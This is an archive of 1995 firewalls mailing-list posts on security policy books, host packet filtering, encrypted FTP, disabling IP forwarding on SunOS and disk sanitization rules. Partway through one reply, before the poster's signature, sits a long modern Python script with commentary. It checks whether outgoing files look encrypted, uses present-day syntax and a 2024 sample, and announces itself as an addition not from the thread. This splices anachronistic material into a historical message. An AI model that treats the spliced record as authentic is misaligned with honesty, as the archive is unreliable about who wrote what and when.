Regards, Chris From firewalls-owner Mon Aug 7 13:38:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA26339 for firewalls-outgoing; Mon, 7 Aug 1995 12:38:48 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA26315 for ; Mon, 7 Aug 1995 12:38:44 -0700 Received: from mail.crl.com(165.113.1.22) by miles via smap (V1.3) id sma026258; Mon Aug 7 12:37:48 1995 Received: from mail.maritz.com by mail.crl.com with SMTP id AA22736 (5.65c/IDA-1.5 for ); Mon, 7 Aug 1995 12:22:22 -0700 Received: by smtpgate with Microsoft Mail id <30268450@smtpgate>; Mon, 07 Aug 95 14:23:28 PDT From: "Crandall, John" To: "'Firewalls'" Subject: Re: InfoSec policies made easy? - YES!! Date: Mon, 07 Aug 95 14:21:00 PDT Message-Id: <30268450@smtpgate> Encoding: 33 TEXT X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I missed the beginning of this thread, can someone provide me more information on Cresson's book? TIA, John Crandall crandaje@maritz.com ---------- From: firewalls-owner To: firewalls Subject: Re: InfoSec policies made easy? - YES!! Date: Sunday, August 06, 1995 6:09PM [stuff deleted] Cresson's book, which I won't call a bible, but it's within arm's reach as I type this, does relieve you of an __awful__ lot of detail work in writing policies. You can go to a client with this and have better than 85% of the work addressed. Not done; not covered, just addressed. Think of it as a well fleshed out "boilerplate". [more stuff deleted] Good book. Go Buy it. 
-- Anton J Aylward The Strahn and Strachan Group Inc Information Security Consultants Voice: (416) 494-8661 Fax: (416) 494-8803 From firewalls-owner Mon Aug 7 14:58:50 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA00163 for firewalls-outgoing; Mon, 7 Aug 1995 14:20:35 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA00141 for ; Mon, 7 Aug 1995 14:20:31 -0700 Received: from noc4.dccs.upenn.edu(128.91.254.39) by miles via smap (V1.3) id sma000133; Mon Aug 7 14:19:49 1995 Received: from POBOX.UPENN.EDU by noc4.dccs.upenn.edu id AA00354; Mon, 7 Aug 95 17:02:13 -0400 Received: from [130.91.74.27] by pobox.upenn.edu id RAA01174; Mon, 7 Aug 1995 17:02:03 -0400 Date: Mon, 7 Aug 1995 17:02:03 -0400 Posted-Date: Mon, 7 Aug 1995 17:02:03 -0400 Message-Id: <199508072102.RAA01174@pobox.upenn.edu> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: millar@pobox.upenn.edu (Dave Millar) Subject: Host protection with ipfilterd? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Someone has asked me if it is appropriate to use ipfilterd to filter access to their SGI host residing on a campus subnet. My take on it is that ipfilterd is appropriate if you want to dedicate your SGI as a router to filter packets between an internal subnet and an external network/subnet, but that it is not the right tool for protecting the SGI host *itself*. Seems to me like tcp wrappers and portmapper are the proper tools for host-based filtering (with the caveat that such filtering is not as comprehensive or flexible as router-based packet filtering, can only address filtering services "mediated" through either inetd or rpc, and therefore can not address filtering other services such as UDP, ICMP, etc.) I assume the same would hold true for screend as well. Am I on the right track, here? 
_________________________________________________ Dave Millar University Information Security Officer 3401 Walnut St., Suite 265C Philadelphia, PA 19104-6228 University of Pennsylvania For security matters: security@isc.upenn.edu (read by Data Admin. staff) Other matters: millar@pobox.upenn.edu voice: (215) 898-2172 fax: (215) 898-1729 For PGP 2.6 Public key: http://www.upenn.edu/security-privacy/ PGP Fingerprint: 28 FB 09 DC C7 96 C2 53 1A B8 BE 3B 73 32 46 4C From firewalls-owner Mon Aug 7 15:00:15 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA29355 for firewalls-outgoing; Mon, 7 Aug 1995 13:59:30 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA29333 for ; Mon, 7 Aug 1995 13:59:24 -0700 Received: from soscorp.soscorp.com(204.52.248.130) by miles via smap (V1.3) id sma029320; Mon Aug 7 13:59:07 1995 Received: from fearless.soscorp.com (fearless.soscorp.com [204.52.249.130]) by brimstone.soscorp.com (2.28/8.6.12/8.6.4.287) with BSMTP id BS0016022/QAA16023; Mon, 7 Aug 1995 16:57:26 -0400 Received: from dauntless.soscorp.com (dauntless.soscorp.com [204.52.249.141]) by fearless.soscorp.com (8.6.10/8.6.4.287) with ESMTP id QAA14511; Mon, 7 Aug 1995 16:56:59 -0400 Received: from dauntless.soscorp.com by dauntless.soscorp.com (8.6.10/SMI-4.1) id QAA13038; Mon, 7 Aug 1995 16:56:55 -0400 Message-Id: <199508072056.QAA13038@dauntless.soscorp.com> To: guido@spooky.lss.cp.philips.com (Guido van Rooij) cc: firewalls@greatcircle.com In-Reply-To: Subject: Re: smap with ESMTP size extension Date: Mon, 07 Aug 1995 16:56:49 -0400 From: Seth Robertson Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In article , Guido van Rooij wrote: >Has someone already extended the TIS fwtk's smap program with >ESMTP size extensions? Freestone's (and obviously Brimstone's) mail proxy supports ESMTP with the size extension. 
It thus also allows you to place administrative limits on maximum message size and the minimum amount of free disk space that must be maintained. There is no theoretical reason why you couldn't stick the Freestone mail proxies on an otherwise fwtk system since there need be no interaction between mail processing and the more generic proxy services--though obviously we would just as soon that you switch totally to Freestone :-) For more information on Freestone, see http://www.soscorp.com/products/Freestone.html ---- Seth Robertson voice: +1 800 SOS UNIX +1 212 686 5700 SOS Corporation fax: +1 212 686 5703 461 5th Avenue, 16th floor email: seth@soscorp.com New York, NY 10017 http://www.soscorp.com/ From firewalls-owner Mon Aug 7 15:32:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA02634 for firewalls-outgoing; Mon, 7 Aug 1995 15:01:47 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA02609 for ; Mon, 7 Aug 1995 15:01:42 -0700 Received: from sentinet.demon.co.uk(158.152.140.128) by miles via smap (V1.3) id sma002586; Mon Aug 7 15:01:19 1995 Received: (from smap@localhost) by bastion.sentinet.demon.co.uk (8.6.12/8.6.12) id VAA02131 for ; Mon, 7 Aug 1995 21:34:47 GMT Received: from server.sentinet.demon.co.uk(192.9.105.100) by bastion.sentinet.demon.co.uk via smap (V1.3) id sma002128; Mon Aug 7 21:34:20 1995 Received: from server.sentinet.demon.co.uk (lyndond@[127.0.0.1]) by server.sentinet.demon.co.uk (8.6.12/8.6.12) with ESMTP id WAA04815 for ; Mon, 7 Aug 1995 22:34:18 +0100 Message-Id: <199508072134.WAA04815@server.sentinet.demon.co.uk> To: firewalls@greatcircle.com Subject: Encrypted ftp connections Date: Mon, 07 Aug 1995 22:33:01 +0100 From: Lyndon David Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Dear All, I have been tasked with setting up an ftp server to communicate with a handful of business partners. 
We wish to have the ability for our partners to be able to send and retrieve files from our server. Due to the nature of the data, the data must be encrypted as it passes over the Internet and strong authentication must be used when they connect. This is a commercial project and the data will cross international boundaries; for this reason I do not want to use encryption technology such as pgp as some of the countries will have problems with this. I see two solutions to encrypt the data: a hardware encryption device is placed at each remote site so that the data is encrypted between the remote and local machine, or mandate in the security policy that the data is encrypted before it is transmitted. In either case the strong authentication could be done with one time hand held authentication devices. Questions: Does anyone know of a hardware solution that can operate between one local machine and 5 or 6 remote machines? Is it possible to use a software solution where the data between ftp client and server is encrypted by the client and server? If encryption of the data before transmission is mandated, what commercial encryption can be used that will be acceptable across international borders, and can anyone think of a method where if someone forgot to encrypt the data before transmission this would be caught and the transfer stopped? Please reply via email, I will summarise the answers and post them back to the list.
Thanks Lyndon

From firewalls-owner Mon Aug 7 17:00:07 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA08312 for firewalls-outgoing; Mon, 7 Aug 1995 16:32:08 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA08284 for ; Mon, 7 Aug 1995 16:32:03 -0700 Received: from ilinx.bctel.net(204.174.66.10) by miles via smap (V1.3) id sma008229; Mon Aug 7 16:31:06 1995 Received: by ilinx.ilinx.com (/\==/\ Smail3.1.28.1 #28.1) id ; Mon, 7 Aug 95 16:29 PDT Message-Id: From: brian@ilinx.ilinx.com (Brian J. Murrell) Date: Mon, 7 Aug 1995 16:29:47 -0700 (PDT) Subject: Re: Encripted ftp connections To: lyndond@sentinet.demon.co.uk Cc: firewalls@greatcircle.com In-Reply-To: <199508072134.WAA04815@server.sentinet.demon.co.uk> Reply-To: brian@ilinx.bctel.net X-Mailer: Ishmail 1.1-950728-386 MIME-Version: 1.0 Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

from the quill of Lyndon David on scroll <199508072134.WAA04815@server.sentinet.demon.co.uk> > Dear All, > > I have been tasked with setting up an ftp server to > communicate with a handful of business partners. We > wish to have the ability for our partners to be able > to send and retrieve files from our server. Due to the > nature of the data the data must be encrypted as it passes > over the Internet and strong authentication must be used > when they connect. You want a VPN (Virtual Private Network). Look through the archives, as there have been plenty of pointers in the last week to products that do VPN. As well as lots of discussion in the past, I'm sure. > This is a commercial project and the data will cross > International boundaries, for this reason I do not want > to use encryption technology such as pgp as some of the > countries will have problems with this. This is going to bite whether you pre-encrypt, or encrypt in the data stream. b. -- Brian J. Murrell brian@ilinx.com InterLinx Support Services, Inc.
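Lyndon's last question above (catching a file that somebody forgot to encrypt before it is sent, and stopping the transfer) can be answered mechanically with a pre-transfer check. The following is an added example, not code from the thread or from any product mentioned in it: it classifies the bytes of an outgoing file as PGP ASCII-armored, binary OpenPGP, compressed, high-entropy or plaintext, and the gate refuses anything that does not fall in an encrypted-looking class. The OpenPGP packet tags and the compressed-file magic numbers are real; the 7.5 bits/byte entropy threshold, the sample inputs and the policy in `transfer_allowed` are this example's assumptions.

```python
"""Pre-transfer gate: refuse to send a file that does not look encrypted.

Added example for this thread; the policy and the samples are assumptions."""
import math
import sys

PGP_ARMOR_HEADER = b"-----BEGIN PGP MESSAGE-----"
# OpenPGP packet tags that can begin an encrypted message (RFC 4880, 4.3):
# 1 public-key encrypted session key, 3 symmetric-key encrypted session key,
# 9 symmetrically encrypted data, 18 sym. encrypted integrity protected data.
ENCRYPTED_PGP_TAGS = {1, 3, 9, 18}
# zip, gzip, bzip2, xz: high entropy, but not encryption.
COMPRESSED_MAGIC = (b"PK\x03\x04", b"\x1f\x8b", b"BZh", b"\xfd7zXZ\x00")
ENTROPY_THRESHOLD = 7.5  # bits per byte (assumed); ciphertext sits near 8.0


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte of data (0.0 for empty input)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def openpgp_packet_tag(first_byte: int):
    """Packet tag from the first byte of an OpenPGP packet, or None."""
    if not first_byte & 0x80:          # bit 7 is set on every OpenPGP packet
        return None
    if first_byte & 0x40:              # new-format header: tag in bits 0-5
        return first_byte & 0x3F
    return (first_byte >> 2) & 0x0F    # old-format header: tag in bits 2-5


def classify(data: bytes) -> str:
    """One of: pgp-armored, pgp-binary, compressed, high-entropy, plaintext."""
    if data.lstrip().startswith(PGP_ARMOR_HEADER):
        return "pgp-armored"
    if data and openpgp_packet_tag(data[0]) in ENCRYPTED_PGP_TAGS:
        return "pgp-binary"
    if data.startswith(COMPRESSED_MAGIC):
        # Checked before the entropy test, or a plain zip file would pass
        # as "encrypted" on entropy alone.
        return "compressed"
    if shannon_entropy(data) >= ENTROPY_THRESHOLD:
        return "high-entropy"
    return "plaintext"


def transfer_allowed(data: bytes) -> bool:
    """Policy (assumed): only encrypted-looking data may leave the site."""
    return classify(data) in {"pgp-armored", "pgp-binary", "high-entropy"}


# Constructed sample inputs, used by the demo below.
SAMPLE_ARMORED = (b"-----BEGIN PGP MESSAGE-----\nVersion: 2.6\n\n"
                  b"(constructed base64 body)\n-----END PGP MESSAGE-----\n")
SAMPLE_PLAINTEXT = b"Invoice 2024-07: amount due 1,250.00 USD\n" * 20
SAMPLE_RANDOMISH = bytes(range(256)) * 16      # flat histogram: 8.0 bits/byte
SAMPLE_ZIP = b"PK\x03\x04" + SAMPLE_RANDOMISH[:1024]

if __name__ == "__main__":
    # Usage: gate.py FILE ...   exits 1 if any file must not be sent.
    bad = 0
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            kind = classify(fh.read())
        ok = kind in {"pgp-armored", "pgp-binary", "high-entropy"}
        print(f"{path}: {kind} -> {'send' if ok else 'REFUSE'}")
        bad += not ok
    sys.exit(1 if bad else 0)
```

Wrap the upload in this check (in whatever script or menu the users invoke to send files) rather than trusting them to remember. The compressed-file test matters because a zip file has entropy close to ciphertext, and the binary OpenPGP test only inspects the first packet header, so treat the gate as a sanity check that stops the obvious mistake, not as proof that a file was encrypted to the right key.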
brian@wimsey.com North Vancouver, B.C. 604 983 UNIX Platform and Brand Independent UNIX Support - R3.2 - R4 - BSD

From firewalls-owner Mon Aug 7 17:30:41 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA11120 for firewalls-outgoing; Mon, 7 Aug 1995 17:21:53 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA11088 for ; Mon, 7 Aug 1995 17:21:48 -0700 Received: from pao.translation.com(204.30.204.3) by miles via smap (V1.3) id sma011082; Mon Aug 7 17:21:27 1995 Received: (from audit@localhost) by translation.com (8.6.12/8.6.12) id RAA19137; Mon, 7 Aug 1995 17:21:13 -0700 Date: Mon, 7 Aug 1995 17:21:13 -0700 Message-Id: <199508080021.RAA19137@translation.com> Received: from unknown(204.30.204.114) by pao via smap (V1.3mjr) id sma019131; Mon Aug 7 17:20:43 1995 X-Sender: afoss@pao X-Mailer: Windows Eudora Version 1.4.3 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: "Bob Bracalente -- MRJ" , firewalls@GreatCircle.COM From: afoss@translation.com (Andrew Foss) Subject: Re: using suns/sunos for gateway host(s) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

adb -k -w /vmunix /dev/mem
ip_forwarding?x      (if this returns 01 it's on)
ip_forwarding/w 0    (turns it off in /dev/mem, your running image)
ip_forwarding?w 0    (turns it off in /vmunix so it'll be off next reboot)
^d                   (exits adb)

At 12:33 PM 8/7/95 -0700, Bob Bracalente -- MRJ wrote: >According to ~The Firewall Book~, things like IP forwarding and IP source >routing should be disabled on gateway hosts used to construct a firewall. > >I called sun tech support, and not surprisingly they didn't have a clue how to >modify the 4.1.3 kernel to achieve this. > >If anyone could give me some pointers, I'd appreciate it. > >Thanks, > >Bob > > Andrew Foss Tel. 415/494-NETS(6387) Network Translation Inc. Dir. 415/855-0725 1901 Embarcadero Rd.
FAX 415/424-9110 Palo Alto, CA 94303 email afoss@translation.com web www.translation.com From firewalls-owner Mon Aug 7 18:00:19 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA11852 for firewalls-outgoing; Mon, 7 Aug 1995 17:36:07 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA11831 for ; Mon, 7 Aug 1995 17:36:03 -0700 Received: from yarrina.connect.com.au(192.189.54.17) by miles via smap (V1.3) id sma011823; Mon Aug 7 17:35:36 1995 Received: from suburbia.net (suburbia.apana.org.au [192.188.107.90]) by yarrina.connect.com.au with ESMTP id KAA14711 (8.6.12/IDA-1.6); Tue, 8 Aug 1995 10:34:22 +1000 Received: (proff@localhost) by suburbia.net (8.6.12/Miles-950430-1) id KAA11842; Tue, 8 Aug 1995 10:34:19 +1000 From: Julian Assange Message-Id: <199508080034.KAA11842@suburbia.net> Subject: Re: Encripted ftp connections To: brian@ilinx.bctel.net Date: Tue, 8 Aug 1995 10:34:18 +1000 (EST) Cc: firewalls@greatcircle.com In-Reply-To: from "Brian J. Murrell" at Aug 7, 95 04:29:47 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 287 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > This is a commercial project and the data will cross > > International bounderies, for this reason I do not want > > to use encription technology such as pgp as some of the > > countries will have problems with this. > Use SSL ftp/ftpd. 
ftp://ftp.psy.uq.oz.au/pub/Crypto/* -Proff

From firewalls-owner Mon Aug 7 18:30:08 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA13606 for firewalls-outgoing; Mon, 7 Aug 1995 18:24:15 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id SAA13570; Mon, 7 Aug 1995 18:24:10 -0700 Received: from uucp5.netcom.com(163.179.3.5) by miles via smap (V1.3) id sma013559; Mon Aug 7 18:23:40 1995 Received: by netcomsv.netcom.com with UUCP (8.6.12/SMI-4.1) id SAA11624; Mon, 7 Aug 1995 18:17:23 -0700 Received: from lat3.lat.com (lat2) by lat.com (4.1/SMI-4.1/LAT.COM-950317-1) id AA24605; Mon, 7 Aug 95 18:12:45 PDT Date: Mon, 7 Aug 95 18:53:36 PDT From: "Jeffrey S. Yunker" Subject: RE: Firewalls-Digest V4 #468 To: firewalls-digest@GreatCircle.COM, Firewalls@GreatCircle.COM X-Mailer: Chameleon ENGP1, TCP/IP for Windows, NetManage Inc. Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

From: nabadm@odo.acdnj.itt.com (set chaos/total) Date: Sun, 6 Aug 1995 10:11:49 -0400 Subject: Re: Sanitizing SCSI disks > Use Norton Wipedisk. Overwrite three times... that'll clear the media enough > so that it can be deemed "unclassified." However, it *STILL* must remain in > the DOD inventory for two years being *USED* in an unclassified mode before > it can be released to the public. (The destruction certificate must also > remain with the computer for two years.) > This is approved up to and including TS. That may have been true under the ISM, but the ISM has now been superseded by the NISPOM. According to the NISPOM "Clearing and Sanitization Matrix", pages 8-3-5 and 8-3-6, it is no longer possible to sanitize TS. All TS material must be destroyed. (NISPOM stands for "National Industrial Security Program Operating Manual". ISM stands for "Industrial Security Manual".) True statement. The new NISPOM allows overwrites ONLY up to secret.
However, the NISPOM exclusively pertains to government contractors. Procedures adopted by gov't contractors need to be approved site by site. Approval authority comes through the Defense Investigative Service (DIS). The DIS is regional, so in practice, things approved at a contractor site in the northeast may not be approved in the southwest, and vice versa. DoD entities all have their own guidelines. AF: AFSSM 5020; Navy: OPNAVINST 5510.1H; Army: AR380-19; and the DoD's "Orange Book" DoD 5200.28-STD for example. ________________________________________________________________ _| _| _|_|_|_|_| Jeff Yunker, Sales Manager _| _|_| |_ Los Altos Technologies, Inc. _| _|_|_| |_ jeff@lat.com, www.lat.com _|_|_|_| _| |_ |_ 415/988-4848, 415/988-4860(fax)

From firewalls-owner Mon Aug 7 23:30:11 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA20889 for firewalls-outgoing; Mon, 7 Aug 1995 23:04:10 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA20864 for ; Mon, 7 Aug 1995 23:04:06 -0700 Received: from vugon.vista.ac.za(196.13.2.16) by miles via smap (V1.3) id sma020858; Mon Aug 7 23:03:07 1995 Received: from weasel.vista.ac.za (weasel.vista.ac.za [196.13.20.20]) by vugon.vista.ac.za (8.6.9/8.6.9) with SMTP id IAA04459 for ; Tue, 8 Aug 1995 08:01:37 +0200 Received: from WLK/SpoolDir by weasel.vista.ac.za (Mercury 1.12); Tue, 8 Aug 95 8:01:42 GMT+2 Received: from SpoolDir by WLK (Mercury 1.12); Tue, 8 Aug 95 8:00:50 GMT+2 From: "Sam Lubbe" Organization: Vista University - Welkom To: firewalls@greatcircle.com Date: Tue, 8 Aug 1995 08:00:26 GMT+2 Subject: Priority: normal X-mailer: Pegasus Mail v3.22 Message-ID: <150417B6A78@weasel.vista.ac.za> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

leave firewalls Sam Lubbe

From firewalls-owner Mon Aug 7 23:43:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA20995 for firewalls-outgoing; Mon, 7 Aug 1995
23:18:08 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA20987 for ; Mon, 7 Aug 1995 23:18:06 -0700 Received: from xwing.wcape.gov.za(164.151.101.253) by miles via smap (V1.3) id sma020985; Mon Aug 7 23:17:58 1995 Received: from cncjnk.wcape.gov.za (cncjnk.wcape.gov.za [164.151.188.247]) by xwing.wcape.gov.za (8.6.11/8.6.12) with SMTP id IAA07948 for ; Tue, 8 Aug 1995 08:16:52 +0200 Received: from CNCJNK/MAILQ by cncjnk.wcape.gov.za (Mercury 1.13); Tue, 8 Aug 95 8:18:23 +0200 Received: from MAILQ by CNCJNK (Mercury 1.13); Tue, 8 Aug 95 8:18:16 +0200 From: "CASSIDY MEYER" Organization: Western Cape Scientific Services To: firewalls@greatcircle.com Date: Tue, 8 Aug 1995 08:18:08 +0200 Subject: iWay-One Priority: normal X-mailer: Pegasus Mail/Windows (v1.22) Message-ID: <187A644343@cncjnk.wcape.gov.za> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Hi everyone Has anyone ever heard of a product called iWay-One? It supposedly acts as a firewall running on a server connected to a router on one end and a LAN on the other, screening all incoming/outgoing traffic. Are there any similar products on the market or available as freeware? What other options do I have besides looking at a server based firewall product, to protect my LAN? Thanks in advance.
Cassidy From firewalls-owner Tue Aug 8 00:31:14 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA22951 for firewalls-outgoing; Tue, 8 Aug 1995 00:13:31 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA22895 for ; Tue, 8 Aug 1995 00:13:23 -0700 Received: from arthur.crpht.lu(158.64.4.8) by miles via smap (V1.3) id sma022881; Tue Aug 8 00:13:11 1995 Received: from cnsmac3.crpht.lu by arthur.crpht.lu with SMTP (1.37.109.4/16.2) id AA26060; Tue, 8 Aug 95 09:11:57 +0200 X-Sender: security@arthur.crpht.lu Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 8 Aug 1995 09:14:48 +0200 To: Firewalls@GreatCircle.COM From: security@crpht.lu (Bruno MAMER) Subject: Re: InfoSec policies made easy? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all, Since it seems to interest people, I remind you all that some policies are available on our site : http://www.crpht.lu/CNS/html/PubServ/Security/documents.html Hope this was short enough Bruno ____________________________________________________________________________ Computing and Network Services (CNS) Centre de Recherche Public Henri Tudor Our local archive on security : http://www.crpht.lu/CNS/html/PubServ/ps_home.html ---------------------------------------------------------------------------- From firewalls-owner Tue Aug 8 01:00:32 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA23453 for firewalls-outgoing; Tue, 8 Aug 1995 00:26:40 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA23437 for ; Tue, 8 Aug 1995 00:26:36 -0700 Received: from medoc.medoc-ias.u-psud.fr(194.57.34.46) by miles via smap (V1.3) id sma023433; Tue Aug 8 00:26:18 1995 Received: (from detzel@localhost) by medoc.medoc-ias.u-psud.fr (8.6.9/8.6.9) id JAA07877; Tue, 8 Aug 1995 09:16:46 +0200 Date: Tue, 8 Aug 1995 09:16:46 +0200 From: Vincent DETZEL Message-Id: 
<199508080716.JAA07877@medoc.medoc-ias.u-psud.fr> To: dmurphy@cwa.com Subject: Re: Sparc2 as a 3-way packet filter? Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

dmurphy wrote: >I've picked up the ipfilter package from Darren Reed, which looks to be >pretty much what I think I need, and the newest version of screend I was >able to find (dated April 1990). Any experiences with either of these two >packages, or pointers to other SW solutions, would be appreciated. Hi ! I'm in the same situation and it's pretty difficult to make up my mind whether to use screend or ip-fil: - screend seems to be well-suited (functionality, documentation, portability, etc. ...) despite the fact it's quite old. - as for ip-fil (ftp:coombs.anu.edu.au/pub/net/kernel/ip-fil2.7.3.tar.gz) it appears to me that it is beginning to be widely chosen and, as a matter of fact, many changes are applied to this package every week (last release dated: Aug 1). Does it mean that ip-fil is going to become much more efficient and functional than screend? Any Comments/Suggestions? Thanks !
-vincent From firewalls-owner Tue Aug 8 01:26:30 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA23158 for firewalls-outgoing; Tue, 8 Aug 1995 00:19:35 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA23122 for ; Tue, 8 Aug 1995 00:19:29 -0700 Received: from relay.philips.nl(130.144.65.1) by miles via smap (V1.3) id sma023115; Tue Aug 8 00:19:07 1995 Received: from cnps.lss.cp.philips.com ([130.144.198.1]) by relay.philips.nl (8.6.9/8.6.9-950414) with SMTP id JAA16124; Tue, 8 Aug 1995 09:17:43 +0200 Received: from spooky.lss.cp.philips.com by cnps.lss.cp.philips.com with smtp (Smail3.1.28.1 #1) id m0sfjwD-0000rMC; Tue, 8 Aug 95 09:23 MET Received: by spooky.lss.cp.philips.com (Smail3.1.29.1 #1) id m0sfiri-000HneC; Tue, 8 Aug 95 09:14 MET DST Message-Id: From: guido@spooky.lss.cp.philips.com (Guido van Rooij) Subject: Re: smap with ESMTP size extension To: seth@soscorp.com (Seth Robertson) Date: Tue, 8 Aug 1995 09:14:18 +0200 (MET DST) Cc: guido@spooky.lss.cp.philips.com, firewalls@greatcircle.com In-Reply-To: <199508072056.QAA13038@dauntless.soscorp.com> from "Seth Robertson" at Aug 7, 95 04:56:49 pm Reply-To: Guido.vanRooij@nl.cis.philips.com (Guido van Rooij) X-Mailer: ELM [version 2.4 PL21] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 489 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Seth Robertson wrote: > > > Freestone's (and obviously Brimstone's) mail proxy supports ESMTP with > the size extension. It thus also allows you to place administrative > limits on maximum message size and the minimum amount of free disk > space that must be maintained. > I am aware of that. But when I tried building it I found myself taking in so many other libs...Further the docs are much too minimal (absent is a better word). So I extended smap with ESMTP (only SIZE). 
-Guido From firewalls-owner Tue Aug 8 02:00:28 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA25790 for firewalls-outgoing; Tue, 8 Aug 1995 01:40:05 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA25775 for ; Tue, 8 Aug 1995 01:39:59 -0700 Received: from gateway.ps.net(192.131.85.2) by miles via smap (V1.3) id sma025770; Tue Aug 8 01:39:18 1995 Received: from uhea001.gb.ec.ps.net by gateway.ps.net with SMTP id AA02849 (InterLock SMTP Gateway 3.0 for ); Tue, 8 Aug 1995 03:37:59 -0500 Message-Id: <199508080837.AA02849@gateway.ps.net> To: firewalls@greatcircle.com Date: Tue, 8 Aug 1995 09:38:04 +0100 (BST) From: "frosta" X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 19 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk suspend firewalls From firewalls-owner Tue Aug 8 02:17:51 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA25538 for firewalls-outgoing; Tue, 8 Aug 1995 01:32:48 -0700 Received: (smap@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA25514 for ; Tue, 8 Aug 1995 01:32:41 -0700 Received: from gmap15.leeds.ac.uk(129.11.84.200) by miles via smap (V1.3) id sma025477; Tue Aug 8 01:31:43 1995 Received: from gmap3 (gmap-mailhub.leeds.ac.uk [129.11.200.3]) by gmap-gw.leeds.ac.uk (8.6.12/8.6.9) with ESMTP id JAA22584 for ; Tue, 8 Aug 1995 09:25:55 +0100 Received: from gmap.leeds.ac.uk (gmap124 [129.11.200.124]) by gmap3 (8.6.12/8.6.9) with SMTP id JAA12823 for ; Tue, 8 Aug 1995 09:30:21 +0100 From: Danny Cox Date: Tue, 8 Aug 1995 09:27:36 +0100 Message-Id: <6328.9508080827@gmap.leeds.ac.uk> To: firewalls@greatcircle.com Subject: klaxon X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Subsequent to my request about which entries in /etc/services to keep I've downloaded and built klaxon to watch on unusual ports. I'm a little confused about how to use it though. 
I entered it into my /etc/inetd.conf but perhaps I got this wrong. Does it generate daemon messages? What status are they? I get no entries in my /var/log/syslog (Solaris 2.3 btw) at the minute, hence the previous questions. Thanks again, danny

